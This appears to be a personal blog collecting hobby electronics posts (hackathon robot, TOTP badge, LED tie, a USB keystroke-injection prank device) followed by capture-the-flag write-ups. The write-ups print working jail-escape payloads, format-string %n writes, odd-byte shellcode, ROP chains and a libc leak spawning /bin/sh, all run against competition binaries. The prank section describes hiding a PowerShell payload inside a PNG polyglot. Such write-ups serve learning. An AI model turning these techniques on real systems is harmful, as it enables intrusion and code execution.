Demo Video:

Explanation Video:

• More pictures and videos
• Additionally, check out the documentary for the Outernet hackathon, I like to call it Outerdoc.

Full edited video coming soon™

Hack Club’s summer hackathon in VT saw people from all over the world work together towards the theme: to “make others laugh”. I’m pretty sure Hot Dog was a successful part of that.

This picture is of the circuit I put together and programmed, which combines everyone’s work on the spray mechanism, taser, guitar button reading, and battery (explained further in the video).

Here’s the source code on GitHub, although beware, it’s hackathon quality code.

TODO: add more info from video in text form, post schematics, more pictures??

Notes

Made by (L to R): yours truly (Karmanyaah Malhotra), Diego Abadie, (the amazing lead) Kevin Yang, Tinu Vanapamula, and Roshan Karim

I feel insanely lucky to have been part of a team where we achieved this crazy feat in such a short period of time, and none of this would’ve been possible without every single person’s contributions and everyone who organized Outernet! (Including the people that brought the tasers. Taser games are incredibly cool too!)

This video demos all the features of this board:

The reasoning and instructions for making this board can be found on this workshop I wrote on how to make this board: https://jams.hackclub.com/batches/sparkletilt-pcb/

TODO: add more info from video in text form, post schematics and source code on GitHub??

Notes

None of this would’ve been possible without the following individuals and groups. Huge thanks to:

• TODO: Code on GitHub, link to libraries
• Hugo Hu for his Corgi Arduino design
• Hack Club for inspiring and funding this
• Kognise for the cool header photo editing

_{Is the video title catchy enough?}

It uses Pimoroni’s Badger2040 board, which is an awesome PCB that integrates an E-ink display and RP2040 microcontroller.

On the back, there’s a DS3231 with wires soldered to it, going to the JST-SH for I2C and a JST-PH going to the raw battery. The RP2040 gives power to the interface part of the RTC through the I2C wires. And I designed a case to protect the wiring.

More pictures, 3D files, and code on GitHub.

The UX code is in the second half of totp/__init__.py. If you connect to the Badger using rshell or thonny, you can run set_time.py to save your computer’s time to the RTC. The otp.json file allows you to input your codes.

So why did this simple take me 2 years and 11 months to finish? Well, the lack of access to a 3D printer and letting perfect be the enemy of progress. While the badger is an inconvenient form factor for this task - something keychain sized would be better - I have been using it since I printed the case at school in April and it was easy to build and works just fine. I spent a whole bunch of time on this v1, but just gave up for all of 2021 because it was too much of a pain to build.

But, this project is still not finished. To achieve my ideal form factor, I’m planning on building v3 with a Game&Light wrist watch inspired custom PCB. More to come soon^TM.

Acknowledgements

At its core this project just ties a other people’s serious code together. Huge thanks to:

• Pimoroni for the Badger2040, BadgerOS, and associated e-ink libraries.
• Edd Mann’s Pico 2FA TOTP library for doing all the actual TOTP computations in MicroPython in ./totp/.
• Peter Hinch’s DS3231 Driver in ./rtc.py.
• My 3D Printed case was inspired by https://www.thingiverse.com/thing:5997974 and https://www.thingiverse.com/thing:5271558 and used this DS3231 model for sizing.

Idea

I had several Flora NeoPixels and conductive thread lying around since a previous project, so on Feb 19, I decided to make an Ampli-Tie for Prom (March 25), which meant that unlike most, this project had a hard deadline _HC.

Parts:

1. Flora NeoPixels (13)
2. Adafruit Conductive Thread (2-ply, ymmv)
3. Microcontroller - I used a Seeed Xiao nRF52840 because of integrated BLE
4. A microphone (I used a generic MAX4466-based mic, wouldn’t recommend)
5. This really nice silicone stranded ribbon cable from Amazon
6. Black Paint/Paint Pen
7. General soldering supplies (Tweezers, Helping Hands, Solder, Iron)
8. General sewing supplies (Black string, Fray Check/Super Glue, Needles)
9. And a tie, of course

Preparation

Fast forward a month to March 18.

I started my personal engineering notebook (thanks VRC). Of all my attempts at formalizing project documentation, I have a good feeling about this one. What’s better than a simple paper notebook and pencil?

As I had previously discovered, Flora NeoPixels are crazy bright. When you run them at 100% brightness they are impossible to stare at. This is great because running them at 10% brightness is more than enough for a dark hall, and instead of 60mA per pixel, you now use less than 6mA per pixel (assuming all three colors are on at once).

My goal was to stay under 100mA so I could reasonably power it through whatever internal processing happened going from USB +5V -> VCC pin on the microcontroller board.

After a bit of testing, 16 NeoPixels + the microcontroller only used 62mA at 10% duty cycle with all RGB LEDs on.

Some placement tests showed me that 13 pixels over 39cm should be perfect. Minimizing pixels minimizes build time and power consumption.

Then, I harvested the pixels from a nonfunctional project and scraped off as much superglue as I could.

Sewing

After tearing open the tie, it was just hours and hours of sewing for three days straight. Terminating stitches is the hardest part, and you need to do that between every single LED,

So there was sewing

and testing

and sewing

and more time spent sewing and testing the connections than the entire ideation, prototype, and wearing process (if this were YouTube this would be the build montage). Check out Adafruit’s guide on sewing with Flora for more details.

Because I didn’t want to rip apart the tie, I encountered a big obstacle, the name tag. Here was where the silicone wire shined. Connecting ~ LED 3 to ~LED 10 created a “highway” of current, not only bypassing a nearly impossible stitch but also reducing total resistance by letting current bypass huge chunks of the high-resistance conductive thread.

Finally, after soldering on the microcontroller, I had the hardware done! But did it work?

Code

I pulled together some code from the various Adafruit tutorials, reusing the same core as their Ampli-Tie. That handled all the Bluetooth communications and core effects. The audiobusio mechanisms from the original Adafruit code weren’t working with the nRF52840 board, so I hacked together a simple ADC-based Mic Reader in under hours. After starting this up, I realized that the mic was only outputting 3.6V all the time, being the last day, I just cut off the painted mic and replaced it with an unpainted one that I could hide under the collar. Still, when at T-2 hours the audio graph didn’t work, I decided to move on with just static colors and patterns.

The final code can be found at github.com/karmanyaahm/neopixels.

Turns out, with a pretty Cyan running at 6% brightness (more than enough for an accessory in the center of one’s field of view), the whole thing consumed under 25mA at 5V (125mW). That is enough to last 60 hours using my 5000mAh power bank (assuming 3V from the battery and 50% efficiency) - I could easily downsize my power bank … or … ADD MORE LIGHTS! (Soon^TM)

Overall, the Bluefruit app’s default cyan serendipitously complimented the rest of my Navy Blue outfit, and the tie was a great party trick - literally.

Here’s a video of me controlling it:

Rubber Duckies are cool

Demo:

Find my code on GitHub (v1 is code as of writing this blog post).

This is a quick summary of my process, I’ll update this post w/ more details later.

Take a ~$2 microcontroller in a USB form factor, the Digispark, program it with a virtual (bit-bang) USB stack to emulate a Keyboard (already done by them). Add a proper USB jack and a 3d printed case (thanks to my friend Jaxzog for doing the 3d work!). And you get a very adept and flexible but cheap prank device.

It is also educational, demonstrating the hazards of leaving computers unattended and unlocked. This just changes your desktop background, but it is easy to imagine something that steals private data.

I have been working on Project Oreo since the start of the 2022-23 school year. There is still a lot more to be done to optimize this.

• OS Detection (fingerprint the order of USB packets to detect which OS is connected, currently, one device only does one OS)
• A funnier image
• Faster, more efficient keystroke sequences

Thanks to Jaxzog for the case design and help with creating keystroke sequences.

Cool Tech

Polyglots

For the Windows version, I use file format polyglots to hide my powershell script payload. A polyglot is one file that is two different things at once depending on the point of view. My background image contains the background changing script in a header comment, so when read by powershell, it is a script, but when read by a PNG image parser, it is an image.

IPFS

The image is hosted on the content-addressed IPFS, so the Windows script can loop through multiple servers in case one is blocked, and will end up getting the same image.

I have been working on UnifiedPush for the past 2 years, and surprisingly never wrote about it here.

I was pleasantly surprised by the attention we got, with 700+ upvotes and lots of discussion on Hacker News, 800+ combined upvotes on Reddit, many boosts on Fedi and lots of people joining our chat to ask for help w/ UP.

I drafted and co-ordinated w/ F-Droid to publish this. I had editing help from these awesome folks:

• binwiederhier (developer of ntfy.sh)
• MayeulC - UnifiedPush contributor
• S1m - Of course, creator of UnifiedPush

And my friend Jaxzog.

In the process, I made this fancy diagram:

So, since I started driving recently, I noticed that if back-to-back cars have equal acceleration, they naturally create a following distance based on the following driver’s reaction time. Is this real? Kinematics and integrals to the rescue!

So, first, let’s pretend that we have two cars with following distance \(d_f = 0\) at a traffic light. At t=0, the lights turn green, and the velocity of both cars is 0. Velocity-time graphs are the key here because they show both distance and acceleration as area and slope, respectively.

At t=1 the front car starts accelerating at a constant acceleraiton of \(1m/s^2\), and at t=2, trying to match the front car, the back car does the same.

Then, let’s say, at t=4, at 3m/s, the front stops accelerating, and at t=5, after reaching the same velocity, the back stops accelerating.

Throughout the period when they were both accelerating, they had a velocity differential relative to one another of 1m/s. That is where they gain the following distance. Since acceleration is constant, but velocity is not equal.

The area between those two curves, \(d_f = \int v_b - v_g \, dt\) is the following distance, the parallelogram, in this case, is equal to the total velocity times the reaction time, \(3m/s * 1s = 3m\).

The same phenomenon applies when braking, where as two drivers push on the break equally hard, the distance between them gradually decreases as they come to a stop.

Looking at the distance-time graph, which starts quadratic and then settles into linear, explains this phenomenon even better.

P.S. Humans do not drive with constant acceleration and instead have complex feedback loops. This is simply a high-level overview of this pattern in an ideal universe.

If you’d like to follow along, you can find the source code and prompts for the challenges on the UIUC sigpwny GitHub.

Jail

Jails refer to shells or execution environments that are restricted in some way, to prevent unauthorized actions like reading sensitive files or accessing other network services. Jail CTF challenges are about exploiting a bug in the jail configuration that lets you read sensitive files (the flag).

safepy

This is simply an evaluating the user input with a couple of restrictions. I tried reading the code with:

print(open("main.py").read()) or x*x*x

And, after a couple attempts at looking around the system with __import__("os"), I found the flag:

print(open("/flag").read()) or x*x*x

I was testing and sending the payloads like this:

echo 'print(open("/flag").read()) or x*x*x'| nc safepy.chal.uiuc.tf 1337 -v

A Horse with No Names

The source code is provided for this challenge. I also know that ‘A Horse with No Neighs’ was a challenge released to fix a unintended solution with this challenge.

The primary restriction on your execution payload is that you cannot have more than 4 consecutive letters at the beginning of the string. The difference between this challenge and Neighs is that in Neighs you cannot have 4 consecutive characters ever. The bug here was that they used re.match instead of re.search. Also, you can only have <= 4 unique special characters.

It executes your filtered input using

eval(compile(horse, "<horse>", "eval").replace(co_names=()))

I started debugging what co_names really meant. We can’t use anything that has a co_name, because it’s overwritten.

compile('''print()  and __import__("os") + (lambda x: x)''', "<horse>","eval").co_names

Interestingly, both print and __import__ have co_names, but lambda does not. Also, any co_name within a function (the lambda context) does not count as a function. That means, you can execute code like*

(lambda:print("hi"))()

To read the flag, I attempt:

(lambda:open('/flag.txt').read())()

But running this reminded me of the special character limitation. This has 6: (,),:,',/,.

I figured, if I could eval some sort of encoded string, I should be able to do this. This reminded me of ‘My First Calculator’ from BCACTF ‘22. After iterating through a ton of different possible options, I settled on using chr. That would leave me with the special characters (,),: for just getting to the lambda, and + for joining together the chr outputs.

I can encode any arbitrary into the chr(decimal representation)+chr(next…) form by using this python loop

ss = '''open('/flag.txt').read()'''
for i in ss: print(f'chr({ord(i)})+', end='')

Assembling to:

s = "(lambda:eval(chr(111)+chr(112)+chr(101)+chr(110)+chr(40)+chr(39)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)+chr(39)+chr(41)+chr(46)+chr(114)+chr(101)+chr(97)+chr(100)+chr(40)+chr(41)))()"

I put in that payload and got the flag! .
.
.
no no I did not. I got out:

['l', 'n', '_', 'a',  
'a', 'r', 'h', 'w', 'e', 't', 'b', 'a', 'n', '_', 'y', 'f', '{', '_', 'a', 'e', 'i', 'l', 'i', 't', 'c', 'a', 'a'  
, 'f', '_', 'd', 'a', 's', 'm', 't', 'e', 'u', 'r', 'i', 'l', '\n', 'p', 'a', 'a', 'm', 'k', 'i', 'd', 'e', 't',  
's', 'o', 'e', 'y', 'i', 'p', 'h', 'a', 'e', '_', 't', 'c', 'g', '_', 'n', 'l', '_', 'h', 'c', 'v', 'd', 'o', '_'  
, '_', 'y', 'n', '_', 'p', 't', 'l', 'a', 'c', 'i', 'e', '_', 't', '}', 'b', '_', 'i', 'o', 'n', 'c', 'p', 'n', '  
_', 'h', 'a', 'y', 'u']

Which joins to:

ln_aarhwetban_yf{_aeilitcaaf_dasmteuril\npaamkidetsoeyiphae_tcg_nl_hcvdo__yn_ptlacie_t}b_ioncpn_hayu

Wut? Is there a second step of encoding? Did I do something wrong? I checked the source code and realized…

discovery = list(eval(compile(horse, "<horse>", "eval").replace(co_names=())))
random.shuffle(discovery)

:facepalm:

That’s dumb. At least the fix is a little straightforward. I encoded the payload

exec('random.shuffle=lambda x:x') or open('/flag.txt').read()

and sent the encoded payload. And I got the flag!

*Note: I’m writing these payloads from memory, they might not work exactly as written, but work to convey the concept of what I did.

Crypto

Military grade encryption

Pretty basic challenge here, the key takeaway is that the password that starts up the encryption algorithm only has 6 digits. That means there are only a million combinations. We also don’t know which bit size they payload uses, but there are only 4 options, so still only 1 million brute forces. I did a quick test and found that it was progressing fast enough in just Python to be able to brute force the whole keyspace in a few hours.

I wrote a program matching their encrypt program that then brute forced all combinations from 000000 to 999999.

def custom_decrypt(data, password, keysize):
        data = b64decode(data)
        def _gen_key(password):
                key = password
                for i in range(1000):
                        key = MD5(key)
                return key
        key = bytes_to_long(_gen_key(password))
        ciphers = [
                AES.new(KEY_PAD(long_to_bytes((key*(i+1)) % 2**128)) ,AES.MODE_ECB) for i in range(0, keysize, 16)
        ]
        pt_blocks = [
                data[i:i+16] for i in range(0, len(data), 16)
        ]
        return b"".join([cipher.decrypt(pt_block) for pt_block, cipher in zip(pt_blocks, cycle(ciphers))])

if __name__ == '__main__':
        keysize = int(sys.argv[1])
        data = open('flag.enc').read()
        for i in range(0,999999+1):
                ans = custom_decrypt(data, str(i).zfill(6).encode(), keysize)
                if b'uiuctf' in ans: print(ans)
                if not i%1000:
                        print(keysize, i)

And then I ran 4 instances of it with all the key sizes, and got

$ python cipher.py 256
256 0  
256 1000  
256 2000
.
.
.
256 196000  
b'uiuctf{n0t_eNou6h_3ntr0_4_H4ndr0113d_Crypto}\x04\x04\x04\x04'  
256 197000  

Pwn

Odd Shell

The provided binary is not stripped, so I have ghidra decompile it (Ghidra is awesome!)

while( true ) {
  if (local_20 <= local_18) {
    (*(code *)0x123412340000)();
    return 0;
  }
  if ((*(byte *)(local_18 + 0x123412340000) & 1) == 0) break;
  local_18 = local_18 + 1;
}

Key takeaways:

1. It reads and then executes shellcode.
2. The shellcode is at a fixed address.
3. If (any byte & 1) == 0, i.e. if any byte of the payload is even, the shellcode is not executed. Odd Shell, that name makes sense now.

Ideas:

1. Write your shellcode, then somehow XOR mask it. You’ll have to loop over the (fixed) shellcode bytes and XOR them while shifting a mask. If the masking code is written, this makes the rest of the problem really easy.
2. Manually write basic shellcode, then modify it to not use any odd bytes.

I chose option 2 later, because 1 seemed really hard and involved multiple steps. Although, for a larger exploitation routine, it would be far more efficient to have self-masking shellcode. First, to set up the build environment, I looked into various nasm build tutorials, and after a bunch of trial and error, settled on this build setup.

shellcode.asm contained my assembly code. -fbin converts the shellcode to raw (x86_64) machine code, not a full executable binary format. -l /dev/stdout outputs the list file, which is a human-readable file mapping each line of your assembly to the output in hex. I monitored the compiled version of my assembly live by running the following in another shell.

watch 'nasm -fbin shellcode.asm -l /dev/stdout'

The list file is key in looking at which commands result in odd or even bytes.

I started with some standard shellcode from shell-storm.org, and started modifying it.

It took a lot of iteration, but this is what I transformed that into

1. RCX contained the location to the shellcode There are various ways to escape an even byte. XOR it with 1 (i.e. increment), decrement it or increment it (and do the opposite in the code of course).

dec dword [ rcx + 0xb ] ; unless overflow dword fine  
dec dword [ rcx + 0xd ] ; unless overflow dword fine  
db      0x49, 0x31, 0xD3 ; 4831D2 xor     rdx, rdx  

for example, xor rdx, rdx leads to 4831D2h, but 48h and D2h would be blocked by the program filter. So, I store 4931D3 in that location and decrement two of the bytes.

To store the string //bin/sh, I generate an XOR mask, however, just to see the other technique in action. The following section generates the mask using or and shl.

xor r9,r9;
or r9, 1;
shl r9, 7
shl r9, 1
or r9, 1;
shl r9,23;
shl r9,1;
or r9, 1;
shl r9,15;
shl r9,1;
or r9, 1;
shl r9,7;
shl r9,1;
; effectively: xor rbx, r9;

After that, I used the same dec [ rcx + <offset>] technique to escape any other instructions when needed, while following the overall template of the shellcode from shell-storm.org.

You can find my full shellcode (comments and all) here.

Overall, though I had limited time to work on it, UIUCTF was a great opportunity with a lot of challenging problems! Thanks to the team at UIUC that made it possible!

Format Fortune

Let’s gooo format strings. First, to test whether it was a basic memory leak, I input %s%s%s%s%s%s into there, resulting in nothing. I also input repeated %p, which prints the hex content of the memory address, decoded the hex (cyberchef ftw), and got nothing. I also tried enumeration using %<num>$s and that got nowhere.

python -c 'from pwn import *; import sy  
s; write = sys.stdout.buffer.write; write(b"%p"*60 + b"\n")' | ./format-fortune     
Welcome to my casino! You look like you want to throw your life savings away...  
Don't tell anyone, but around here, the house ALWAYS wins.  
Give it a try! But first, what's your name?  
Well, good luck, 0x7ffd96dccfe0(nil)0x7f5dc5501f970x1(nil)0x70257025702570250x70257025702570250x702570  
25702570250x70257025702570250x70257025702570250x70257025702570250x250x2baea833cad1a1000x10x7f5dc542929  
00x4000400x40127f0x1000000000x7ffd96dcf2580x7ffd96dcf2580x230f4ecb10dd8826(nil)0x7ffd96dcf268(nil)Test  
ing your luck... please wait  
  
I warned you! No flag today.

So, it’s probably memory modification using %n. Let’s get into static reversing. Is the binary stripped (function names and similar debug info removed)?

$ file format-fortune    
format-fortune: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /  
lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a2162ce627b72b56316f43d8a1c5e5ee9d6119b8, for GNU/Linux 3.2.  
0, not stripped

not stripped. Nice. Let’s fire up ghidra to decompile.

fgets(local_48,0x32,stdin);
printf("Well, good luck, ");
printf(local_48);
sleep(1);
puts("Testing your luck... please wait");
sleep(2);
if (magic == 0xbeef) {
  puts("\nI\'m impressed! You\'ve won a flag");
  printflag();
}
else {
  puts("\nI warned you! No flag today.");
}

So, we need to use the printf on line 3 to set the variable magic to 0xbeef.

Using readelf again, we see that magic is at 0x40408c, and 0xbeef = 48879.

That means the goal is to print 0xbeef (48879) chars, which can be easily done using %48879s (which will print the string at the first argument right justified to fit 0xbeef characters). Then we will use %n. Basically, %n writes the number of characters that have been written at this point in the format string, to a location in memory specified by the argument. By writing %48879s, we can print 0xbeef characters and then use %n to write 0xbeef to memory.

So, I got stuck for a while finding what argument number x, specified by %x$n, would contain a pointer to magic. Using gdb, I found, there is no pointer to magic on the stack whatsoever. Well then how am I supposed to overwrite magic 🤷.

I looked through some of my old solves of similar problems and realized that when the input is long enough, and the stack is set up right, you can use printf argument specifiers to access the very string you enter. This means, you can get a pointer to any arbitrary address in memory. Basically, anything after the first 6 arguments to printf are stored on the stack, so if you use for example %8$x, you could be printing contents of stuff that you have entered as hex. Or, with %8$n, writing to an address you specify.

So, I sent the following to binary using sys.stdout.buffer.write.

b"%9$lx " + b"A"*18 +p64(0x0040408c) + b"\n"

That returns the following, and the hex shows that 1. my custom bytes were read in right, 2. I can access it with format specifiers.

Well, good luck, 40408c AAAAAAAAAAAAAAAAAA�@@Testing you  

Then, I make minor adjustments to make it print the right number of characters and apply %n. payload:

b"%9$48879lx%9$n" + b"A"*10 +p64(0x0040408c) + b"\n

This is printing 48879 (0xbeef) useless characters, the ‘A’s serve as padding to line up the pointer to magic with the 9th value (%9), and then there’s the pointer. Running that against remote, I get

I'm impressed! You've won a flag  
bcactf{wh0_ev3n_c4me_up_w1tH_%n_38e84f}  
[karmanyaahm@karmanyaahsArch]: ~/CTF/bca22/pwn/formatfortune>$

🎉

ROP Jump

I immediately check whether the binary is stripped and pull up ghidra now that we’re in that territory.

void ropjump(void)

{
  char local_78 [112];
  
  puts("\nBetter start jumping!");
  gets(local_78);
  jumps = jumps + 1.0;
  puts("Woo, that was quite the workout wasn\'t it!");
  return;
}

void b(void)
{
  char local_78 [104];
  FILE *local_10;
  
  if ((jumps < 2.0) && (1.0 < jumps)) {
    local_10 = fopen("flag.txt","r");
    if (local_10 == (FILE *)0x0) {
      puts("\nLooks like we\'ve run out of jump ropes...");
      puts("Challenge is misconfigured. Please contact admin if you see this.");
    }
    else {
      printf((char *)(double)jumps,
             "Wow, how did you manage to jump %.2f times. Guess we might need to return those jump r opes...\n"
            );
      fgets(local_78,100,local_10);
      puts(local_78);
    }
  }
  return;
}

  if ((jumps < 2.0) && (1.0 < jumps)) {

So, to get the flag, we need to jump to b, but also set jumps to a value between 1 and 2. The value of jumps is stored in a 4 byte float. We increment jumps by 1 the first time ropjump is called to read in our overflowed input.

So, I played around with integer -> float memory representations a bit in gdb. So, a memory value of 0x3f800000 is equal to 1.0 when parsed as a float, 0x40000000 is 2.0.

p/f 0x3f800000  
$9 = 1
p/x (float)(1.0 + 1.0)  
$14 = 0x40000000
p/f 0x40000000-0x1  
$16 = 1.99999988

So all I need to do is call ropjump twice (set to 2) and then decrement that buffer by one (int) to get a 1.9999 something float. That sounds easy, let’s just look for the right gadgets…
.
.
. . right. not easy. There aren’t any gadgets performing (inc or dec)s on xmm (float) registers in a way that’s convenient to use here. I’m not going to describe my whole convoluted though process here, but after many hours of iterations and trial and error, I ended up with the following:

Using readelf -s, we know that jumps is stored at 0x40408c.

ls = [  
	0x00000000004013aa, # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret;    
	0x40408c - 0x5d, # rbx = jumps # + 3 might not be, todo, find small byte  
	# no +3  
	0,0,0,0,0, # rbp, r12, r13, r14, r15  
	
	0x00000000004013b3, 0, # single pop for stack alignment  
	0x00000000004013b3, 0, # single pop for stack alignment  
	
	0x00000000004013a9, # or byte ptr [rbx + 0x5d], bl; pop r12; pop r13; pop r14; pop r15; ret;    
	0,0,0,0, # r12,13,14,15  
	
	0x00000000004011d6+4 -4, #b function  
]

The important part here is

pop rbx
0x40408c - 0x5d
or byte ptr [rbx + 0x5d], bl

The register bl in x86_64, is the lowest 8 bits of rbx. So here, it’s set to 0x8c. Basically, this leads to jumps = jumps | 0x8c. Since the lowest bits of jumps are 0 (remember the value of jumps is 0x3f800000), this is setting it to 0x3f80008c. That’s 1.00001669 (nice), and satisfies our between 1 and 2 constraint.

I send this using

p += b''.join([p64(l) for l in ls])  
   # good luck pwning :)  
r.sendline(p)

I then ran into a segfault in the middle of printf on xmm0, and realized it’s the well known stack alignment error where you just need to add a few nop gadgets to align the stack so printf is executed with a stack pointer that is a multiple of 16. Just one nop; ret gadget did it here.

ls = [
	0x00000000004013aa, # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret;    
	0x40408c - 0x5d, # rbx = jumps # + 3 might not be, todo, find small byte  
	# no +3  
	0,0,0,0,0, # rbp, r12, r13, r14, r15  
	
	0x00000000004013b3, 0, # single pop for stack alignment  
	0x00000000004013b3, 0, # single pop for stack alignment  
	0x000000000040114f, #nop for alignment Plzzzz  
	
	0x00000000004013a9, # or byte ptr [rbx + 0x5d], bl; pop r12; pop r13; pop r14; pop r15; ret;    
	0,0,0,0, # r12,13,14,15  
	
	0x00000000004011d6+4 -4, #b function  
]

bcactf{l34rn_t0_jump_then2_r0P_28e12f}

Got libc?

This one was not very exciting, there was some debugging, but largely the ROP library of pwntools took care of everything.

r.recvuntil(b'?\n')
offset = b'A' * 40
rop = ROP(exe)
rop.call("puts", [exe.got['puts']])
rop.call(exe.symbols["main"])
r.sendline(offset + rop.chain())

I call puts on the address of puts, this will give me the address of puts.

rc = r.recvuntil(b'\x7f')  
print(rc.hex())  
puts = u64(rc.ljust(8, b'\0'))  
print('puts at', hex(puts))  
libc.address = puts - libc.symbols["puts"]  
print('libc at', hex(libc.address))

I parse the address of puts, and since I know the relative distance from the start of libc to puts (using the supplied libc file), I can find the relative distance to any other value in libc.

bin_sh = next(libc.search(b"/bin/sh\0"))  
rop = ROP(libc)  
rop.raw(p64(rop.ret.address)) # offset for stack align rop.ret is a simple 'ret' gadget  
rop.call(libc.symbols['system'], [bin_sh])  
rop.call(exe.symbols["main"])  
r.sendline(offset + rop.chain())  
r.interactive()

I search for an occurrence of the string /bin/sh in libc, and then call the system function on that. That launches /bin/sh on the server, and i can interact with it.

$ cat flag.txt
bcactf{ll1bC_h3ights_47d6f3e}

pwnf

Luckily the binary is still not stripped, Ghidra time…

bool echo(void)
{
  size_t sVar1;
  long in_FS_OFFSET;
  char local_38 [40];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  fgets(local_38,0x1a,stdin);
  sVar1 = strlen(local_38);
  if (1 < sVar1) {
    sleep(1);
    printf(local_38);
  }
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return 1 >= sVar1;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

Observations:

1. Proper canary AND no overflow from fgets
2. raw printf

The name pwnf did after all indicate it’s a printf based bug. Anyways, I won’t bore you with all the details of me banging my head against the wall that is attempting to overwrite the GOT/PLT (not realizing the binary is Full RELRO).

In the end, I built a solution that uses techniques very similar to Format Fortune to modify arbitrary values. Since the echo function is called indefinitely in a loop here, I can repeatedly execute commands (i.e. modify memory using %n) without any return-oriented confusion.

I abstracted away the memory modification into a function, modifying a $hn - which, as man 3 printf conveniently reminds me is 2 bytes. I chose hn intervals, because printf printing 65kbytes (2 ^ 16 bits) isn’t too bad, and it’s better than hhn, 1 byte (2 ^ 8 bits) because it requires fewer executions of the printf loop.

def modit(val, argnum, where):  
     payload = f'%{val}c'.encode() if val > 0 else b''  
     payload += f'%{argnum}$hn'.encode()  
     payload += 'i'.encode() * (16-len(payload))  
     payload += p64(where)  
     return payload  

def get_val(r, n):  
    r.recv(timeout=1)  
    r.sendline(f'%{n}$lx'.encode())  
    return int(r.recvuntil(b'\n',timeout=2).strip(), 16)
  
def set8bytes(target, where):  
    print(f"ok so the things i'm writing 0x{hex(target)[2:]} in 4 pieces")  
    return modit((target >> 0) &0xffff , 8, where) + b'\n' + modit((target >> 16) &0xffff, 8, where + 2) + b'\n' + modit((target >> 32) &0xffff, 8, where + 4) + b'\n' + modit((target >> 48) &0xffff, 8, where + 6)

modit does the core modification, get_val is used to extract memory addresses, and set8bytes is just a convinient way to set a whole 8 byte (remember 64 bit) memory location (8 bytes is the size of pointers in 64 bit architectures).

After that, I use a fixed return pointer on the stack to leak the value of main (therefore telling me where every function and variable in the binary is). Similar techniques are used to find libc and the location of the return pointer in the stack. (ignore the somewhat misleading variable names, also I didn’t need all these, but I didn’t know that till later)

r.sendline(b'%13$p')  
r.recvuntil(b'0x')  
leekmain = int(r.recvuntil(b'\n').strip(), 16)
exe.address = leekmain - exe.symbols['main']

r.sendline(b'%9$p')  
r.recvuntil(b'0x')  
leekrippos = int(r.recvuntil(b'\n').strip(), 16)  
rip = leekrippos + 8

r.sendline(b'%15$p')  
r.recvuntil(b'0x', timeout=2)  
print(aa:=r.recvuntil(b'\n',timeout=1))  
leeklibc = int(aa.strip(), 16)  
libc.address = leeklibc - (libc.symbols['__libc_start_main'] + 243) #+ 0x7f6db384ba40 - 0x7f6db3857710

After that, I used ROP techniques to set some registers, and one_gadget to find an exploit path (one_gadget uses a really fascinating set of techniques that I can’t explain here to find one ROP path calling system(/bin/sh) or equivalent).

$ one_gadget libc.so.6
0xe6c7e execve("/bin/sh", r15, r12)  
constraints:  
  [r15] == NULL || r15 == NULL  
  [r12] == NULL || r12 == NULL  
  
0xe6c81 execve("/bin/sh", r15, rdx)  
constraints:  
  [r15] == NULL || r15 == NULL  
  [rdx] == NULL || rdx == NULL  
  
0xe6c84 execve("/bin/sh", rsi, rdx)  
constraints:  
  [rsi] == NULL || rsi == NULL  
  [rdx] == NULL || rdx == NULL  

# this one needs r15 and rdx to be null, r15 is already  
target = 0xe6c81 + libc.address # 0xe6c7e or 0xe6c81 or 0xe6c84  

POP_RDX_RBX = 0x0000000000162866 + libc.address  
r.sendline(set8bytes(POP_RDX_RBX,rip))  
r.sendline(set8bytes(0,rip + 8))  
r.sendline(set8bytes(0,rip + 16))  
r.sendline(set8bytes(target,rip + 24))  
r.sendline() # to return out of main loop

I set rdx to 0 (r15 already is), and then call the one_gadget in this simple rop chain.

And there, I have a shell. a cat flag.txt yields

bcactf{pUtT1nG_1t_4LL_t0G3thr_65a3e0}

(I didn’t solve Notetake WASM during the competition, and I don’t think I am capable of doing it justice with a writeup )

And that’s all the pwn challenges in bcactf 2022! In the end, we were 4th (won $75 + $250 in DigitalOcean credits) in the high school division and scored 6675 out of 9125 total points. I certainly polished a lot of my pwn and rev techniques, thanks to BCA folks!

Input into the program what the programmers never anticipated that you could input. Input extreme cases and see how the program reacts. The whole point of pwning is to find edge cases where the programmer’s intention differs from the actual code.

You can find the source code for these challenges at https://github.com/BCACTF/bcactf-3.0

Intro 2 Pwn

Connecting to the shell leads to:

Hi, welcome to Pwning 101.  
Your balance is $10. Please select an item:  
1. Buy a hamster ($1)  
2. Buy the flag ($100)
(1 or 2)>

Having done many challenges similar to this before, I knew what to do immediately.

In this case, a pretty simple input is negative numbers, and sure enough, buying -90 hamsters makes our balance $10+90. And then we can just buy the flag 🤷.

BOF Shop

BOF presumably stands for buffer overflow. Again, experience was key here to me finding a quick solution. If you want to under stand how and why buffer overflows work, this is not the best post for you, but

python -c "print('A' * <count> + 'd')" | nc  
bin.bcactf.com 49174

The prompt said we need to overwrite the (presumably) integer that’s storing the coins value to 100. Using an ASCII table, we know that the character d is equal to the integer 100, We can vary count manually to find the write number of bytes to write that results in the d getting put into the right position in memory.

Keep in mind here, that in x86_64, values are stored in little-endian. This means that putting ‘d\0\0\0’ (sending nothing is equal to leaving those bytes empty in this context) into a buffer in memory will result in the bytes getting read like

• d = 100 « 0
• \0 = 0 « 8
• \0 = 0 « 16
• \0 = 0 « 24

The number, if written down in conventional order (in base256) would be ‘\0\0\0d’. The first value supplied is the least-significant and the last one is most-significant.

python -c "print('A' * 116 + 'd')"  
| nc bin.bcactf.com 49174    
Hello there, welcome to the BOF Shop!  
What's your name?  
> Your balance: 100 coins  
  
Wow. Here, take the flag in exchange for your 100 coins.  
bcactf{buFF3r_0v3rflow_M4D3_3asy_71f7e2}

Jump Rope

Looking at the source, a basic ROP challenge. ROP stands for return oriented programming. ROP’s elevator pitch is that you overwrite the return pointer (how the code knows where to return to after a function returns) using an existing buffer overflow.

This challenge just requires us to overwrite the return pointer to a function that will print the flag (saw that in the provided source code).

We use pwn checksec to see that there is no PIE on this binary (PIE stands for Position Independent Executable), for us, it means that the addresses to the functions will always be the same, they won’t have varying prefixes.

$ pwn checksec jumprope/jumprope  
[*] '/home/karmanyaahm/CTF/bca22/pwn/jumprope/jumprope'  
   Arch:     amd64-64-little  
